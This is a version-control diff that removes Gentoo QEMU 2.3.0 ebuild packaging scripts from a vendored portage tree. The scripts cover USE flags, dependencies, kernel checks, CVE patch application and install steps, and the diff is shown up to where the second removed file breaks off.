@ -1,615 +0,0 @@
# Copyright 1999-2015 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Id$
EAPI=5
PYTHON_COMPAT=( python2_7 )
PYTHON_REQ_USE="ncurses,readline"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils
BACKPORTS=
if [[ ${PV} = *9999* ]]; then
EGIT_REPO_URI="git://git.qemu.org/qemu.git"
inherit git-2
SRC_URI=""
else
SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2
${BACKPORTS:+
https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}"
KEYWORDS="amd64 ~ppc ~ppc64 x86 ~x86-fbsd"
fi
DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools"
HOMEPAGE="http://www.qemu.org http://www.linux-kvm.org"
LICENSE="GPL-2 LGPL-2 BSD-2"
SLOT="0"
IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \
gtk gtk2 infiniband iscsi +jpeg \
kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs
+png pulseaudio python \
rbd sasl +seccomp sdl selinux smartcard snappy spice ssh static static-softmmu \
static-user systemtap tci test +threads tls usb usbredir +uuid vde +vhost-net \
virtfs +vnc xattr xen xfs"
COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips
mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32
x86_64"
IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb xtensa xtensaeb"
IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 sparc32plus"
use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS})
use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS})
IUSE+=" ${use_softmmu_targets} ${use_user_targets}"
# Require at least one softmmu or user target.
# Block USE flag configurations known to not work.
REQUIRED_USE="|| ( ${use_softmmu_targets} ${use_user_targets} )
${PYTHON_REQUIRED_USE}
gtk2? ( gtk )
qemu_softmmu_targets_arm? ( fdt )
qemu_softmmu_targets_microblaze? ( fdt )
qemu_softmmu_targets_ppc? ( fdt )
qemu_softmmu_targets_ppc64? ( fdt )
static? ( static-softmmu static-user )
static-softmmu? ( !alsa !pulseaudio !bluetooth !opengl !gtk !gtk2 )
virtfs? ( xattr )"
# Yep, you need both libcap and libcap-ng since virtfs only uses libcap.
#
# The attr lib isn't always linked in (although the USE flag is always
# respected). This is because qemu supports using the C library's API
# when available rather than always using the extranl library.
COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)]
sys-libs/zlib[static-libs(+)]
xattr? ( sys-apps/attr[static-libs(+)] )"
SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
>=x11-libs/pixman-0.28.0[static-libs(+)]
aio? ( dev-libs/libaio[static-libs(+)] )
caps? ( sys-libs/libcap-ng[static-libs(+)] )
curl? ( >=net-misc/curl-7.15.4[static-libs(+)] )
fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] )
glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] )
infiniband? ( sys-infiniband/librdmacm:=[static-libs(+)] )
jpeg? ( virtual/jpeg:=[static-libs(+)] )
lzo? ( dev-libs/lzo:2[static-libs(+)] )
ncurses? ( sys-libs/ncurses:0=[static-libs(+)] )
nfs? ( >=net-fs/libnfs-1.9.3[static-libs(+)] )
numa? ( sys-process/numactl[static-libs(+)] )
png? ( media-libs/libpng:0=[static-libs(+)] )
rbd? ( sys-cluster/ceph[static-libs(+)] )
sasl? ( dev-libs/cyrus-sasl[static-libs(+)] )
sdl? ( >=media-libs/libsdl-1.2.11[static-libs(+)] )
seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] )
snappy? ( app-arch/snappy[static-libs(+)] )
spice? ( >=app-emulation/spice-0.12.0[static-libs(+)] )
ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] )
tls? ( net-libs/gnutls[static-libs(+)] )
usb? ( >=virtual/libusb-1-r1[static-libs(+)] )
uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] )
vde? ( net-misc/vde[static-libs(+)] )
xfs? ( sys-fs/xfsprogs[static-libs(+)] )"
USER_LIB_DEPEND="${COMMON_LIB_DEPEND}"
X86_FIRMWARE_DEPEND="
>=sys-firmware/ipxe-1.0.0_p20130624
pin-upstream-blobs? (
~sys-firmware/seabios-1.7.5
~sys-firmware/sgabios-0.1_pre8
~sys-firmware/vgabios-0.7a
)
!pin-upstream-blobs? (
sys-firmware/seabios
sys-firmware/sgabios
sys-firmware/vgabios
)"
CDEPEND="
!static-softmmu? ( $(printf "%s? ( ${SOFTMMU_LIB_DEPEND//\[static-libs(+)]} ) " ${use_softmmu_targets}) )
!static-user? ( $(printf "%s? ( ${USER_LIB_DEPEND//\[static-libs(+)]} ) " ${use_user_targets}) )
qemu_softmmu_targets_i386? ( ${X86_FIRMWARE_DEPEND} )
qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} )
accessibility? ( app-accessibility/brltty )
alsa? ( >=media-libs/alsa-lib-1.0.13 )
bluetooth? ( net-wireless/bluez )
gtk? (
gtk2? ( x11-libs/gtk+:2 )
!gtk2? ( x11-libs/gtk+:3 )
x11-libs/vte:2.90
)
iscsi? ( net-libs/libiscsi )
opengl? ( virtual/opengl )
pulseaudio? ( media-sound/pulseaudio )
python? ( ${PYTHON_DEPS} )
sdl? ( media-libs/libsdl[X] )
smartcard? ( dev-libs/nss !app-emulation/libcacard )
spice? ( >=app-emulation/spice-protocol-0.12.3 )
systemtap? ( dev-util/systemtap )
usbredir? ( >=sys-apps/usbredir-0.6 )
virtfs? ( sys-libs/libcap )
xen? ( app-emulation/xen-tools )"
DEPEND="${CDEPEND}
dev-lang/perl
=dev-lang/python-2*
sys-apps/texinfo
virtual/pkgconfig
kernel_linux? ( >=sys-kernel/linux-headers-2.6.35 )
gtk? ( nls? ( sys-devel/gettext ) )
static-softmmu? ( $(printf "%s? ( ${SOFTMMU_LIB_DEPEND} ) " ${use_softmmu_targets}) )
static-user? ( $(printf "%s? ( ${USER_LIB_DEPEND} ) " ${use_user_targets}) )
test? (
dev-libs/glib[utils]
sys-devel/bc
)"
RDEPEND="${CDEPEND}
selinux? ( sec-policy/selinux-qemu )
"
STRIP_MASK="/usr/share/qemu/palcode-clipper"
QA_PREBUILT="
usr/share/qemu/openbios-ppc
usr/share/qemu/openbios-sparc64
usr/share/qemu/openbios-sparc32
usr/share/qemu/palcode-clipper
usr/share/qemu/s390-ccw.img
usr/share/qemu/u-boot.e500
"
QA_WX_LOAD="usr/bin/qemu-i386
usr/bin/qemu-x86_64
usr/bin/qemu-alpha
usr/bin/qemu-arm
usr/bin/qemu-cris
usr/bin/qemu-m68k
usr/bin/qemu-microblaze
usr/bin/qemu-microblazeel
usr/bin/qemu-mips
usr/bin/qemu-mipsel
usr/bin/qemu-or32
usr/bin/qemu-ppc
usr/bin/qemu-ppc64
usr/bin/qemu-ppc64abi32
usr/bin/qemu-sh4
usr/bin/qemu-sh4eb
usr/bin/qemu-sparc
usr/bin/qemu-sparc64
usr/bin/qemu-armeb
usr/bin/qemu-sparc32plus
usr/bin/qemu-s390x
usr/bin/qemu-unicore32"
DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure
you have the kernel module loaded before running kvm. The easiest way to
ensure that the kernel module is loaded is to load it on boot.\n
For AMD CPUs the module is called 'kvm-amd'\n
For Intel CPUs the module is called 'kvm-intel'\n
Please review /etc/conf.d/modules for how to load these\n\n
Make sure your user is in the 'kvm' group\n
Just run 'gpasswd -a <USER> kvm', then have <USER> re-login."
qemu_support_kvm() {
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \
use qemu_softmmu_targets_ppc || use qemu_softmmu_targets_ppc64 \
use qemu_softmmu_targets_s390x; then
return 0
fi
return 1
}
pkg_pretend() {
if use kernel_linux && kernel_is lt 2 6 25; then
eerror "This version of KVM requres a host kernel of 2.6.25 or higher."
elif use kernel_linux; then
if ! linux_config_exists; then
eerror "Unable to check your kernel for KVM support"
else
CONFIG_CHECK="~KVM ~TUN ~BRIDGE"
ERROR_KVM="You must enable KVM in your kernel to continue"
ERROR_KVM_AMD="If you have an AMD CPU, you must enable KVM_AMD in"
ERROR_KVM_AMD+=" your kernel configuration."
ERROR_KVM_INTEL="If you have an Intel CPU, you must enable"
ERROR_KVM_INTEL+=" KVM_INTEL in your kernel configuration."
ERROR_TUN="You will need the Universal TUN/TAP driver compiled"
ERROR_TUN+=" into your kernel or loaded as a module to use the"
ERROR_TUN+=" virtual network device if using -net tap."
ERROR_BRIDGE="You will also need support for 802.1d"
ERROR_BRIDGE+=" Ethernet Bridging for some network configurations."
use vhost-net && CONFIG_CHECK+=" ~VHOST_NET"
ERROR_VHOST_NET="You must enable VHOST_NET to have vhost-net"
ERROR_VHOST_NET+=" support"
if use amd64 || use x86 || use amd64-linux || use x86-linux; then
CONFIG_CHECK+=" ~KVM_AMD ~KVM_INTEL"
fi
use python && CONFIG_CHECK+=" ~DEBUG_FS"
ERROR_DEBUG_FS="debugFS support required for kvm_stat"
# Now do the actual checks setup above
check_extra_config
fi
fi
if grep -qs '/usr/bin/qemu-kvm' "${EROOT}"/etc/libvirt/qemu/*.xml; then
eerror "The kvm/qemu-kvm wrappers no longer exist, but your libvirt"
eerror "instances are still pointing to it. Please update your"
eerror "configs in /etc/libvirt/qemu/ to use the -enable-kvm flag"
eerror "and the right system binary (e.g. qemu-system-x86_64)."
die "update your virt configs to not use qemu-kvm"
fi
}
pkg_setup() {
enewgroup kvm 78
}
src_prepare() {
# Alter target makefiles to accept CFLAGS set via flag-o
sed -i -r \
-e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \
Makefile Makefile.target || die
# Cheap hack to disable gettext .mo generation.
use nls || rm -f po/*.po
epatch "${FILESDIR}"/qemu-1.7.0-cflags.patch
epatch "${FILESDIR}"/${P}-CVE-2015-3456.patch #549404
epatch "${FILESDIR}"/${P}-CVE-2015-3209.patch #551752
epatch "${FILESDIR}"/${P}-CVE-2015-5158.patch #555680
epatch "${FILESDIR}"/${P}-CVE-2015-3214.patch #556052
epatch "${FILESDIR}"/${P}-CVE-2015-5154-1.patch #556050 / #555532
epatch "${FILESDIR}"/${P}-CVE-2015-5154-2.patch #556050 / #555532
epatch "${FILESDIR}"/${P}-CVE-2015-5154-3.patch #556050 / #555532
epatch "${FILESDIR}"/${P}-CVE-2015-5165-1.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-2.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-3.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-4.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-5.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-6.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5165-7.patch #556304
epatch "${FILESDIR}"/${P}-CVE-2015-5166.patch #556304
[[ -n ${BACKPORTS} ]] && \
EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \
epatch
# Fix ld and objcopy being called directly
tc-export AR LD OBJCOPY
# Verbose builds
MAKEOPTS+=" V=1"
epatch_user
}
##
# configures qemu based on the build directory and the build type
# we are using.
#
qemu_src_configure() {
debug-print-function ${FUNCNAME} "$@"
local buildtype=$1
local builddir=$2
local static_flag="static-${buildtype}"
# audio options
local audio_opts="oss"
use alsa && audio_opts="alsa,${audio_opts}"
use sdl && audio_opts="sdl,${audio_opts}"
use pulseaudio && audio_opts="pa,${audio_opts}"
local conf_opts=(
--prefix=/usr
--sysconfdir=/etc
--libdir=/usr/$(get_libdir)
--docdir=/usr/share/doc/${PF}/html
--disable-bsd-user
--disable-guest-agent
--disable-strip
--disable-werror
--python="${PYTHON}"
--cc="$(tc-getCC)"
--cxx="$(tc-getCXX)"
--host-cc="$(tc-getBUILD_CC)"
$(use_enable debug debug-info)
$(use_enable debug debug-tcg)
--enable-docs
$(use_enable tci tcg-interpreter)
$(use_enable xattr attr)
)
# Disable options not used by user targets as the default configure
# options will autoprobe and try to link in a bunch of unused junk.
conf_softmmu() {
if [[ ${buildtype} == "user" ]] ; then
echo "--disable-${2:-$1}"
else
use_enable "$@"
fi
}
conf_opts+=(
$(conf_softmmu accessibility brlapi)
$(conf_softmmu aio linux-aio)
$(conf_softmmu bluetooth bluez)
$(conf_softmmu caps cap-ng)
$(conf_softmmu curl)
$(conf_softmmu fdt)
$(conf_softmmu glusterfs)
$(conf_softmmu gtk)
$(conf_softmmu infiniband rdma)
$(conf_softmmu iscsi libiscsi)
$(conf_softmmu jpeg vnc-jpeg)
$(conf_softmmu kernel_linux kvm)
$(conf_softmmu lzo)
$(conf_softmmu ncurses curses)
$(conf_softmmu nfs libnfs)
$(conf_softmmu numa)
$(conf_softmmu opengl)
$(conf_softmmu png vnc-png)
$(conf_softmmu rbd)
$(conf_softmmu sasl vnc-sasl)
$(conf_softmmu sdl)
$(conf_softmmu seccomp)
$(conf_softmmu smartcard smartcard-nss)
$(conf_softmmu snappy)
$(conf_softmmu spice)
$(conf_softmmu ssh libssh2)
$(conf_softmmu tls quorum)
$(conf_softmmu tls vnc-tls)
$(conf_softmmu tls vnc-ws)
$(conf_softmmu usb libusb)
$(conf_softmmu usbredir usb-redir)
$(conf_softmmu uuid)
$(conf_softmmu vde)
$(conf_softmmu vhost-net)
$(conf_softmmu virtfs)
$(conf_softmmu vnc)
$(conf_softmmu xen)
$(conf_softmmu xen xen-pci-passthrough)
$(conf_softmmu xfs xfsctl)
)
case ${buildtype} in
user)
conf_opts+=(
--enable-linux-user
--disable-system
--target-list="${user_targets}"
--disable-blobs
--disable-tools
)
;;
softmmu)
conf_opts+=(
--disable-linux-user
--enable-system
--target-list="${softmmu_targets}"
--with-system-pixman
--audio-drv-list="${audio_opts}"
)
use gtk && conf_opts+=( --with-gtkabi=$(usex gtk2 2.0 3.0) )
;;
esac
# Add support for SystemTAP
use systemtap && conf_opts+=( --enable-trace-backend=dtrace )
# We always want to attempt to build with PIE support as it results
# in a more secure binary. But it doesn't work with static or if
# the current GCC doesn't have PIE support.
if use ${static_flag}; then
conf_opts+=( --static --disable-pie )
else
gcc-specs-pie && conf_opts+=( --enable-pie )
fi
einfo "../configure ${conf_opts[*]}"
cd "${builddir}"
../configure "${conf_opts[@]}" || die "configure failed"
# FreeBSD's kernel does not support QEMU assigning/grabbing
# host USB devices yet
use kernel_FreeBSD && \
sed -i -E -e "s|^(HOST_USB=)bsd|\1stub|" "${S}"/config-host.mak
}
src_configure() {
local target
python_setup
softmmu_targets= softmmu_bins=()
user_targets= user_bins=()
for target in ${IUSE_SOFTMMU_TARGETS} ; do
if use "qemu_softmmu_targets_${target}"; then
softmmu_targets+=",${target}-softmmu"
softmmu_bins+=( "qemu-system-${target}" )
fi
done
for target in ${IUSE_USER_TARGETS} ; do
if use "qemu_user_targets_${target}"; then
user_targets+=",${target}-linux-user"
user_bins+=( "qemu-${target}" )
fi
done
[[ -n ${softmmu_targets} ]] && \
einfo "Building the following softmmu targets: ${softmmu_targets}"
[[ -n ${user_targets} ]] && \
einfo "Building the following user targets: ${user_targets}"
if [[ -n ${softmmu_targets} ]]; then
mkdir "${S}/softmmu-build"
qemu_src_configure "softmmu" "${S}/softmmu-build"
fi
if [[ -n ${user_targets} ]]; then
mkdir "${S}/user-build"
qemu_src_configure "user" "${S}/user-build"
fi
}
src_compile() {
if [[ -n ${user_targets} ]]; then
cd "${S}/user-build"
default
fi
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
default
fi
}
src_test() {
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
pax-mark m */qemu-system-* #515550
emake -j1 check
emake -j1 check-report.html
fi
}
qemu_python_install() {
python_domodule "${S}/scripts/qmp/qmp.py"
python_doscript "${S}/scripts/kvm/kvm_stat"
python_doscript "${S}/scripts/kvm/vmxcap"
python_doscript "${S}/scripts/qmp/qmp-shell"
python_doscript "${S}/scripts/qmp/qemu-ga-client"
}
src_install() {
if [[ -n ${user_targets} ]]; then
cd "${S}/user-build"
emake DESTDIR="${ED}" install
# Install binfmt handler init script for user targets
newinitd "${FILESDIR}/qemu-binfmt.initd-r1" qemu-binfmt
fi
if [[ -n ${softmmu_targets} ]]; then
cd "${S}/softmmu-build"
emake DESTDIR="${ED}" install
# This might not exist if the test failed. #512010
[[ -e check-report.html ]] && dohtml check-report.html
if use kernel_linux; then
udev_dorules "${FILESDIR}"/65-kvm.rules
fi
if use python; then
python_foreach_impl qemu_python_install
fi
fi
# Disable mprotect on the qemu binaries as they use JITs to be fast #459348
pushd "${ED}"/usr/bin >/dev/null
pax-mark m "${softmmu_bins[@]}" "${user_bins[@]}"
popd >/dev/null
# Install config file example for qemu-bridge-helper
insinto "/etc/qemu"
doins "${FILESDIR}/bridge.conf"
# Remove the docdir placed qmp-commands.txt
mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/qmp/"
cd "${S}"
dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt
newdoc pc-bios/README README.pc-bios
dodoc docs/qmp/*.txt
if [[ -n ${softmmu_targets} ]]; then
# Remove SeaBIOS since we're using the SeaBIOS packaged one
rm "${ED}/usr/share/qemu/bios.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../seabios/bios.bin /usr/share/qemu/bios.bin
fi
# Remove vgabios since we're using the vgabios packaged one
rm "${ED}/usr/share/qemu/vgabios.bin"
rm "${ED}/usr/share/qemu/vgabios-cirrus.bin"
rm "${ED}/usr/share/qemu/vgabios-qxl.bin"
rm "${ED}/usr/share/qemu/vgabios-stdvga.bin"
rm "${ED}/usr/share/qemu/vgabios-vmware.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../vgabios/vgabios.bin /usr/share/qemu/vgabios.bin
dosym ../vgabios/vgabios-cirrus.bin /usr/share/qemu/vgabios-cirrus.bin
dosym ../vgabios/vgabios-qxl.bin /usr/share/qemu/vgabios-qxl.bin
dosym ../vgabios/vgabios-stdvga.bin /usr/share/qemu/vgabios-stdvga.bin
dosym ../vgabios/vgabios-vmware.bin /usr/share/qemu/vgabios-vmware.bin
fi
# Remove sgabios since we're using the sgabios packaged one
rm "${ED}/usr/share/qemu/sgabios.bin"
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../sgabios/sgabios.bin /usr/share/qemu/sgabios.bin
fi
# Remove iPXE since we're using the iPXE packaged one
rm "${ED}"/usr/share/qemu/pxe-*.rom
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386; then
dosym ../ipxe/8086100e.rom /usr/share/qemu/pxe-e1000.rom
dosym ../ipxe/80861209.rom /usr/share/qemu/pxe-eepro100.rom
dosym ../ipxe/10500940.rom /usr/share/qemu/pxe-ne2k_pci.rom
dosym ../ipxe/10222000.rom /usr/share/qemu/pxe-pcnet.rom
dosym ../ipxe/10ec8139.rom /usr/share/qemu/pxe-rtl8139.rom
dosym ../ipxe/1af41000.rom /usr/share/qemu/pxe-virtio.rom
fi
fi
qemu_support_kvm && readme.gentoo_create_doc
}
pkg_postinst() {
if qemu_support_kvm; then
readme.gentoo_print_elog
ewarn "Migration from qemu-kvm instances and loading qemu-kvm created"
ewarn "save states has been removed starting with the 1.6.2 release"
ewarn
ewarn "It is recommended that you migrate any VMs that may be running"
ewarn "on qemu-kvm to a host with a newer qemu and regenerate"
ewarn "any saved states with a newer qemu."
ewarn
ewarn "qemu-kvm was the primary qemu provider in Gentoo through 1.2.x"
if use x86 || use amd64; then
ewarn
ewarn "The /usr/bin/kvm and /usr/bin/qemu-kvm wrappers are no longer"
ewarn "installed. In order to use kvm acceleration, pass the flag"
ewarn "-enable-kvm when running your system target."
fi
fi
if [[ -n ${softmmu_targets} ]] && use kernel_linux; then
udev_reload
fi
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
if use virtfs && [ -n "${softmmu_targets}" ]; then
local virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
fi
}
pkg_info() {
echo "Using:"
echo " $(best_version app-emulation/spice-protocol)"
echo " $(best_version sys-firmware/ipxe)"
echo " $(best_version sys-firmware/seabios)"
if has_version sys-firmware/seabios[binary]; then
echo " USE=binary"
else
echo " USE=''"
fi
echo " $(best_version sys-firmware/vgabios)"
}

616
sdk_container/src/third_party/portage-stable/app-emulation/qemu/qemu-2.3.0-r6.ebuild vendored
View File

@ -1,616 +0,0 @@
# Copyright 1999-2015 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Id$
EAPI=5
PYTHON_COMPAT=( python2_7 )
PYTHON_REQ_USE="ncurses,readline"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils
BACKPORTS=
if [[ ${PV} = *9999* ]]; then
EGIT_REPO_URI="git://git.qemu.org/qemu.git"
inherit git-2
SRC_URI=""
else
SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2
${BACKPORTS:+
https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}"
KEYWORDS="~amd64 ~ppc ~ppc64 ~x86 ~x86-fbsd"
fi
DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools"
HOMEPAGE="http://www.qemu.org http://www.linux-kvm.org"
LICENSE="GPL-2 LGPL-2 BSD-2"
SLOT="0"
IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \
gtk gtk2 infiniband iscsi +jpeg \
kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs
+png pulseaudio python \
rbd sasl +seccomp sdl selinux smartcard snappy spice ssh static static-softmmu \
static-user systemtap tci test +threads tls usb usbredir +uuid vde +vhost-net \
virtfs +vnc xattr xen xfs"
COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips
mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32
x86_64"
IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb xtensa xtensaeb"
IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 sparc32plus"
use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS})
use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS})
IUSE+=" ${use_softmmu_targets} ${use_user_targets}"
# Require at least one softmmu or user target.
# Block USE flag configurations known to not work.
REQUIRED_USE="|| ( ${use_softmmu_targets} ${use_user_targets} )
${PYTHON_REQUIRED_USE}
gtk2? ( gtk )
qemu_softmmu_targets_arm? ( fdt )
qemu_softmmu_targets_microblaze? ( fdt )
qemu_softmmu_targets_ppc? ( fdt )
qemu_softmmu_targets_ppc64? ( fdt )
static? ( static-softmmu static-user )
static-softmmu? ( !alsa !pulseaudio !bluetooth !opengl !gtk !gtk2 )
virtfs? ( xattr )"
# Yep, you need both libcap and libcap-ng since virtfs only uses libcap.
#
# The attr lib isn't always linked in (although the USE flag is always
# respected). This is because qemu supports using the C library's API
# when available rather than always using the extranl library.
COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)]
sys-libs/zlib[static-libs(+)]
xattr? ( sys-apps/attr[static-libs(+)] )"
SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
>=x11-libs/pixman-0.28.0[static-libs(+)]
aio? ( dev-libs/libaio[static-libs(+)] )
caps? ( sys-libs/libcap-ng[static-libs(+)] )
curl? ( >=net-misc/curl-7.15.4[static-libs(+)] )
fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] )
glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] )
infiniband? ( sys-infiniband/librdmacm:=[static-libs(+)] )
jpeg? ( virtual/jpeg:=[static-libs(+)] )
lzo? ( dev-libs/lzo:2[static-libs(+)] )
ncurses? ( sys-libs/ncurses:0=[static-libs(+)] )
nfs? ( >=net-fs/libnfs-1.9.3[static-libs(+)] )
numa? ( sys-process/numactl[static-libs(+)] )
png? ( media-libs/libpng:0=[static-libs(+)] )
rbd? ( sys-cluster/ceph[static-libs(+)] )
sasl? ( dev-libs/cyrus-sasl[static-libs(+)] )
sdl? ( >=media-libs/libsdl-1.2.11[static-libs(+)] )
seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] )
snappy? ( app-arch/snappy[static-libs(+)] )
spice? ( >=app-emulation/spice-0.12.0[static-libs(+)] )
ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] )
tls? ( net-libs/gnutls[static-libs(+)] )
usb? ( >=virtual/libusb-1-r1[static-libs(+)] )
uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] )
vde? ( net-misc/vde[static-libs(+)] )
xfs? ( sys-fs/xfsprogs[static-libs(+)] )"
USER_LIB_DEPEND="${COMMON_LIB_DEPEND}"
X86_FIRMWARE_DEPEND="
>=sys-firmware/ipxe-1.0.0_p20130624
pin-upstream-blobs? (
~sys-firmware/seabios-1.7.5
~sys-firmware/sgabios-0.1_pre8
~sys-firmware/vgabios-0.7a
)
!pin-upstream-blobs? (
sys-firmware/seabios
sys-firmware/sgabios
sys-firmware/vgabios
)"
CDEPEND="
!static-softmmu? ( $(printf "%s? ( ${SOFTMMU_LIB_DEPEND//\[static-libs(+)]} ) " ${use_softmmu_targets}) )
!static-user? ( $(printf "%s? ( ${USER_LIB_DEPEND//\[static-libs(+)]} ) " ${use_user_targets}) )
qemu_softmmu_targets_i386? ( ${X86_FIRMWARE_DEPEND} )
qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} )
accessibility? ( app-accessibility/brltty )
alsa? ( >=media-libs/alsa-lib-1.0.13 )
bluetooth? ( net-wireless/bluez )
gtk? (
gtk2? ( x11-libs/gtk+:2 )
!gtk2? ( x11-libs/gtk+:3 )
x11-libs/vte:2.90
)
iscsi? ( net-libs/libiscsi )
opengl? ( virtual/opengl )
pulseaudio? ( media-sound/pulseaudio )
python? ( ${PYTHON_DEPS} )
sdl? ( media-libs/libsdl[X] )
smartcard? ( dev-libs/nss !app-emulation/libcacard )
spice? ( >=app-emulation/spice-protocol-0.12.3 )
systemtap? ( dev-util/systemtap )
usbredir? ( >=sys-apps/usbredir-0.6 )
virtfs? ( sys-libs/libcap )
xen? ( app-emulation/xen-tools )"
DEPEND="${CDEPEND}
dev-lang/perl
=dev-lang/python-2*
sys-apps/texinfo
virtual/pkgconfig
kernel_linux? ( >=sys-kernel/linux-headers-2.6.35 )
gtk? ( nls? ( sys-devel/gettext ) )
static-softmmu? ( $(printf "%s? ( ${SOFTMMU_LIB_DEPEND} ) " ${use_softmmu_targets}) )
static-user? ( $(printf "%s? ( ${USER_LIB_DEPEND} ) " ${use_user_targets}) )
test? (
dev-libs/glib[utils]
sys-devel/bc
)"
RDEPEND="${CDEPEND}
selinux? ( sec-policy/selinux-qemu )
"
STRIP_MASK="/usr/share/qemu/palcode-clipper"
QA_PREBUILT="
usr/share/qemu/openbios-ppc
usr/share/qemu/openbios-sparc64
usr/share/qemu/openbios-sparc32
usr/share/qemu/palcode-clipper
usr/share/qemu/s390-ccw.img
usr/share/qemu/u-boot.e500
"
QA_WX_LOAD="usr/bin/qemu-i386
usr/bin/qemu-x86_64
usr/bin/qemu-alpha
usr/bin/qemu-arm
usr/bin/qemu-cris
usr/bin/qemu-m68k
usr/bin/qemu-microblaze
usr/bin/qemu-microblazeel
usr/bin/qemu-mips
usr/bin/qemu-mipsel
usr/bin/qemu-or32
usr/bin/qemu-ppc
usr/bin/qemu-ppc64
usr/bin/qemu-ppc64abi32
usr/bin/qemu-sh4
usr/bin/qemu-sh4eb
usr/bin/qemu-sparc
usr/bin/qemu-sparc64
usr/bin/qemu-armeb
usr/bin/qemu-sparc32plus
usr/bin/qemu-s390x
usr/bin/qemu-unicore32"
DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure
you have the kernel module loaded before running kvm. The easiest way to
ensure that the kernel module is loaded is to load it on boot.\n
For AMD CPUs the module is called 'kvm-amd'\n
For Intel CPUs the module is called 'kvm-intel'\n
Please review /etc/conf.d/modules for how to load these\n\n
Make sure your user is in the 'kvm' group\n
Just run 'gpasswd -a <USER> kvm', then have <USER> re-login."
qemu_support_kvm() {
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \
use qemu_softmmu_targets_ppc || use qemu_softmmu_targets_ppc64 \
use qemu_softmmu_targets_s390x; then
return 0
fi
return 1
}
pkg_pretend() {
if use kernel_linux && kernel_is lt 2 6 25; then
eerror "This version of KVM requres a host kernel of 2.6.25 or higher."
elif use kernel_linux; then
if ! linux_config_exists; then
eerror "Unable to check your kernel for KVM support"
else
CONFIG_CHECK="~KVM ~TUN ~BRIDGE"
ERROR_KVM="You must enable KVM in your kernel to continue"
ERROR_KVM_AMD="If you have an AMD CPU, you must enable KVM_AMD in"
ERROR_KVM_AMD+=" your kernel configuration."
ERROR_KVM_INTEL="If you have an Intel CPU, you must enable"
ERROR_KVM_INTEL+=" KVM_INTEL in your kernel configuration."
